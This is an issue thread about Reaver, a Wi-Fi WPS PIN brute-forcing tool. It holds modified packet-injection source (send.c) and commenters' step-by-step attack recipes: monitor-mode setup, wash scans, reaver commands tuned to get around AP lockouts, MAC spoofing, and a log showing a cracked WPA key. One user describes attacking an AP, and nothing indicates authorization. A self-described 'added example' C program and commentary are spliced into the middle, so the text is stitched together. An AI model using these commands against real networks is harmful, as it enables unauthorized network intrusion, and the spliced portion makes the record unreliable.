 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 *
 *
 * In addition, as a special exception, the copyright holders give
 * permission to link the code of portions of this program with the
 * OpenSSL library under certain conditions as described in each
 * individual source file, and distribute linked combinations
 * including the two.
 * You must obey the GNU General Public License in all respects
 * for all of the code used other than OpenSSL.  If you modify
 * file(s) with this exception, you may extend this exception to your
 * version of the file(s), but you are not obligated to do so.  If you
 * do not wish to do so, delete this exception statement from your
 * version.  If you delete this exception statement from all source
 * files in the program, then also delete it here.
 */

#include <unistd.h>   /* usleep(), used by the delay added in send_msg() */
#include "send.h"

/* Initiate the WPS session with an EAPOL START packet */
int send_eapol_start()
{
    const void *packet = NULL;
    size_t packet_len = 0;
    int ret_val = 0;

    packet = build_eapol_start_packet(&packet_len);

    if(packet)
    {
        cprintf(VERBOSE, "[+] Sending EAPOL START request\n");
        ret_val = send_packet(packet, packet_len);
        free((void *) packet);
    }

    /*
     * This is used to track how many times an EAPOL START request is sent
     * in a row.
     *
     * It is cleared by the process_packets() function when an EAP identity
     * request is received.
     *
     * If it reaches EAPOL_START_MAX_TRIES, do_wps_exchange() will notify
     * the user.
     */
    set_eapol_start_count(get_eapol_start_count() + 1);

    return ret_val;
}

/* Send an identity response packet */
int send_identity_response()
{
    const void *packet = NULL, *identity = NULL;
    size_t packet_len = 0;
    int ret_val = 0;

    identity = WFA_REGISTRAR;
    packet = build_eap_packet(identity, strlen(identity), &packet_len);

    if(packet)
    {
        cprintf(VERBOSE, "[+] Sending identity response\n");
        ret_val = send_packet(packet, packet_len);
        free((void *) packet);
    }

    return ret_val;
}

/*
 * Send the appropriate WPS message based on the current WPS state
 * (globule->wps->state)
 */
int send_msg(int type)
{
    int ret_val = 0;
    const struct wpabuf *msg = NULL;
    unsigned char *payload = NULL;
    const void *packet = NULL;
    size_t packet_len = 0;
    uint16_t payload_len = 0;
    enum wsc_op_code opcode = 0;
    struct wps_data *wps = get_wps();

    /*
     * Jeff's change: wait 0.2 s before answering the AP, so the reply is
     * not sent faster than the AP's WPS state machine can take it.
     */
    /* cprintf(VERBOSE, "Pause .2 secs\n"); */
    usleep(200000);

    /*
     * Get the next message we need to send based on the data retrieved
     * from wps_registrar_process_msg (see exchange.c).
     */
    msg = wps_registrar_get_msg(wps, &opcode, type);
    set_opcode(opcode);

    if(msg)
    {
        /* Get a pointer to the actual data inside of the wpabuf */
        payload = (unsigned char *) wpabuf_head(msg);
        payload_len = (uint16_t) msg->used;

        /* Build and send an EAP packet with the message payload */
        packet = build_eap_packet(payload, payload_len, &packet_len);
        if(packet)
        {
            if(send_packet(packet, packet_len))
            {
                ret_val = 1;
            }
            /*
             * pcap_inject() copies the frame, so the buffer is ours to free
             * whether or not the injection succeeded.
             */
            free((void *) packet);
        }

        wpabuf_free((struct wpabuf *) msg);
    }

    return ret_val;
}

/*
 * Send a WSC_NACK message followed by an EAP failure packet.
 * This is only called when completely terminating a cracking session.
 */
void send_termination()
{
    const void *data = NULL;
    size_t data_size = 0;

    data = build_eap_failure_packet(&data_size);

    if(data)
    {
        send_packet(data, data_size);
        free((void *) data);
    }
}

/* Send a WSC_NACK message */
void send_wsc_nack()
{
    struct wps_data *wps = get_wps();

    wps->state = SEND_WSC_NACK;
    send_msg(SEND_WSC_NACK);
}

/*
 * All transmissions are handled here to ensure that the receive timer
 * is always started immediately after a packet is transmitted.
 */
int send_packet(const void *packet, size_t len)
{
    int ret_val = 0;

    if(pcap_inject(get_handle(), packet, len) == len)
    {
        ret_val = 1;
    }

    start_timer();

    return ret_val;
}
Original comment by jeff.j.h...@gmail.com
on 27 Aug 2012 at 10:55
I am having the same issues. Could someone guide me on how I go about the last
comment here by Jeff? Or is there a place I can download his Reaver changes
that I can install? His instructions are as follows:
" So, without further ado, if anyone would like to give this a shot replace the contents of 'send.c' with the code pasted below and recompile (make clean, configure, make, make install)."
Thanks for any help anyone can give me.
Original comment by cashcla...@gmail.com
on 26 Sep 2012 at 5:10
To Cashcla...
Notice that Jeff is not referring to the main issue on the thread (repeatedly
receiving errors with code 0x02 and 0x03). It seems he is receiving an M
response lower than the M message he sent, i.e. he sends an M2 message and gets
back an M1 response. Notice g00gl3c... has this error at the tail of his log in
comment 21. Make sure you understand this is a fix for this error (according to
Jeff, I actually haven't tested it, but you should trust him, no harm in
trying.) If this is in fact the error you are receiving, then go ahead and try
out Jeff's code.
If I understand your question, you are asking how to make a change to a file
of a program managed by Make and reinstall the program. Here is how to apply
Jeff's change for the Linux noob (no offense, keep at it, you learn quick.)
Open up a terminal and do as follows (for most if not all Linux distributions,
just type the commands as you see them if not noted otherwise; anything after
a # is a comment):
cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
gedit jeffsendc.txt # or whatever text editor you have, I suggest one with a GUI
                    # if you don't have very much experience
# Now in the blank text file copy in the code for send.c in Jeff's comment,
# then save it and close. Back to the terminal:
sudo make distclean
cp send.c send.c.old
rm send.c
cat jeffsendc.txt > send.c
./configure
make
sudo make install
# now you are done applying Jeff's changes!
# Maybe it turns out you actually don't want this change, maybe it is
# full of bugs and acts really unexpectedly; this is how you revert back to the
# original. If this is the case, open up the terminal again, and just like
# before, input the commands as follows:
cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
sudo make distclean
rm send.c
mv send.c.old send.c
./configure
make
sudo make install
# everything should be back to normal
Original comment by mikedan...@gmail.com
on 18 Oct 2012 at 8:52
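The sequencing problem behind Jeff's send.c change and the explanation above (the registrar has already answered M1 with M2 and then sees another M1, or sees a message it never expected) can be modelled on its own. The C program below is an added example written for this page, not code from Reaver or from anyone in this thread: it is a simplified registrar-side state machine that classifies each incoming enrollee message as the expected one, as a tolerated retransmit of the enrollee's last message, or as out of order. The enum values, struct names, the counters and the assumption that the registrar replies to every accepted message immediately are this example's own; the sample message sequences are constructed.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Registration-protocol message ordinals (M1..M8). Odd messages come from
 * the enrollee (the AP, when Reaver acts as registrar), even ones from the
 * registrar. These are positions in the exchange, not on-the-wire values. */
enum wsc_msg { M1 = 1, M2, M3, M4, M5, M6, M7, M8 };

enum seq_result {
    SEQ_OK,            /* the message we were waiting for */
    SEQ_REPEAT,        /* enrollee re-sent its last message; keep waiting */
    SEQ_OUT_OF_ORDER   /* anything else: the exchange has gone wrong */
};

struct seq_state {
    int last_received; /* last enrollee message accepted, 0 at session start */
    int last_sent;     /* last registrar message sent, 0 at session start */
    int accepted;      /* counters kept for the summary */
    int repeats;
    int failures;
};

void seq_init(struct seq_state *s)
{
    memset(s, 0, sizeof *s);
}

/* Classify one incoming enrollee message. Assumption of this model: the
 * registrar answers every accepted M(2k+1) with M(2k+2) immediately, so the
 * next expected enrollee message is always last_sent + 1. */
enum seq_result seq_receive(struct seq_state *s, int received, bool tolerate_repeats)
{
    int expected = s->last_sent + 1;   /* M1 first, then M3, M5, M7 */

    if (received == expected) {
        s->last_received = received;
        s->last_sent = received + 1;
        s->accepted++;
        return SEQ_OK;
    }
    if (tolerate_repeats && received == s->last_received) {
        /* The enrollee has not seen our reply yet and re-sent its last
         * message. Ignoring it keeps the session alive instead of
         * NACKing and starting the pin over. */
        s->repeats++;
        return SEQ_REPEAT;
    }
    s->failures++;
    return SEQ_OUT_OF_ORDER;
}

const char *seq_result_name(enum seq_result r)
{
    switch (r) {
    case SEQ_OK:     return "ok";
    case SEQ_REPEAT: return "repeat";
    default:         return "out-of-order";
    }
}

/* Feed a whole constructed sequence through the model. Returns the number
 * of out-of-order messages; the counters are copied to *out if given. */
int run_sequence(const int *msgs, int n, bool tolerate_repeats, struct seq_state *out)
{
    struct seq_state s;
    seq_init(&s);
    for (int i = 0; i < n; i++) {
        enum seq_result r = seq_receive(&s, msgs[i], tolerate_repeats);
        printf("  recv M%d -> %s\n", msgs[i], seq_result_name(r));
    }
    if (out)
        *out = s;
    return s.failures;
}

int main(void)
{
    /* Constructed sample: an AP that keeps re-sending M1 until it sees M2 */
    const int blasting_m1[] = { M1, M1, M1, M3, M5, M7 };
    /* Constructed sample: the enrollee skips straight from M1 to M5 */
    const int skipped[] = { M1, M5 };
    int n1 = (int)(sizeof blasting_m1 / sizeof blasting_m1[0]);
    int n2 = (int)(sizeof skipped / sizeof skipped[0]);

    printf("repeated M1, strict:\n");
    printf("  failures: %d\n", run_sequence(blasting_m1, n1, false, NULL));
    printf("repeated M1, repeats tolerated:\n");
    printf("  failures: %d\n", run_sequence(blasting_m1, n1, true, NULL));
    printf("skipped M3, repeats tolerated:\n");
    printf("  failures: %d\n", run_sequence(skipped, n2, true, NULL));
    return 0;
}
```

With repeats tolerated, the repeated-M1 sequence completes with zero failures, while a genuinely skipped message is still rejected; in strict mode every extra M1 counts as a failure, which is the behaviour the thread describes as the session being killed and restarted.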
..........SOLVED.............
For Ralink RT2870/3070 chipset --- rt2800usb ---- my device is edup ed-3070usb.
I'm using BT5R1 GNOME VMware 32 bit & VMware Player 4.0.3 703057
-----------------------------------------------------------------
OPEN THE TERMINAL and write:
1- airmon-ng -------------------(show your interface)
2- airmon-ng start wlan0 ------(you should start mon0 with this command)
3- iwconfig -------------------(and check your wlan0 and mon0)
4- wicd start ------------------(we should start wicd)
5- apt-get install wicd-curses -(only a suggestion, I'm using that sometimes... OPTIONAL)
----------------------------------------------------------------
NOW HERE WE GO
FIRSTLY CLEAR THE TERMINAL WITH clear
6- clear -----------------------( no comments, whatever )
7- wash -i mon0 -s -C -----------(show WPS and select one)
8- reaver -i mon0 -b 00:11:22:33:44:55 -c 1 -d 15 -vv
( -i : interface | -b : bssid | -c : channel | -d: delay time | )
Now we are waiting for the WPS PIN; it worked slowly, for me it took 70-80 minutes.
That's all...
I tried it and it worked, sorry for my bad English and simple expression..
I hope that my help is useful...
If you have some question write me on TWITTER: @yigitcomposer
and special thanks to Craig Heffner
Original comment by yigitcom...@gmail.com
on 8 Dec 2012 at 2:06
I've tried every method posted here and I'm still getting this error: "WPS
transaction failed (code: 0x02), re-trying last pin". I tried changing the
parameters. The AP I'm attacking has -55 signal strength. I got to 0.55% last
time and I got the error above followed by an error which says something about
waiting for 60 seconds before trying again. I'm at my wits' end with reaver tbh,
can anyone help me please.
I used the following commands:
wash -i mon0 -s -C
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360
Original comment by samdoy...@googlemail.com
on 30 Dec 2012 at 10:27
itmanvn's comment #17 solution worked for me! It's slow but it's at least trying
pins now. Before, I let it sit for 2 days and it never made it through a single
pin.
Original comment by peeon...@gmail.com
on 4 Jan 2013 at 1:55
This works for me: MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC
spoofing with the --mac option, but you must ensure that you have spoofed your
MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named
mon0) WILL NOT WORK. You must change the MAC address of your wireless card's
physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 22763 seconds
[+] WPS PIN: '
[+] WPA PSK: '
[+] AP SSID: '
Original comment by greeneco...@gmail.com
on 30 Jan 2013 at 2:28
on 1.3 the command for no-nacks is -n not -N
Original comment by nabilalk
on 31 Mar 2013 at 3:57
Hi everyone, I tried all of the methods and it doesn't work. Is there anyone
who can point me to the best solution for WPS locks, especially code 0x02 and
code 0x03?
I would really appreciate it.
Thank you
Original comment by upicreat...@gmail.com
on 1 Mar 2014 at 10:24
Comment #23 worked for me after some trial and error with -r and -d
Original comment by crisosto...@yahoo.com
on 11 Mar 2014 at 12:43
Optimal parameters for me are:
reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -d 5 -r 3:15 -T .5
Original comment by nvyuew...@gmail.com
on 28 Apr 2014 at 4:42
If you see code 0x02 and 0x03 but it still continues on and checks different pins,
I wouldn't worry about it, let it go... you get all kinds of timeout errors
etc. and it still works, it just takes a long time
Original comment by 360...@gmail.com
on 7 May 2014 at 4:50
I had the same issue, and I solved it by running iwconfig and actually checking
that there was not only mon0 but also mon1. When using mon0 it didn't work and
returned that error; when I switched to mon1 it found the correct pin in a matter
of seconds.
"reaver -i mon1 -c CHANNEL -b BSSID -vv"
Original comment by internet...@gmail.com
on 31 Dec 2014 at 2:27
Nobody seems to be able to resolve this issue
Original comment by kkchiu...@gmail.com
on 25 Jan 2015 at 12:56
Still got 0x002 problem :(
Original comment by ilkr...@gmail.com
on 3 Mar 2015 at 7:10
Continuously got 0x04 error
Original comment by geiser...@gmail.com
on 23 Apr 2015 at 8:19
wps transaction failed (code: 0x03) error
plz help guys
Original comment by royalarm...@gmail.com
on 15 May 2015 at 6:20
Original issue reported on code.google.com by
m...@c0refailure.com
on 23 Jan 2012 at 5:03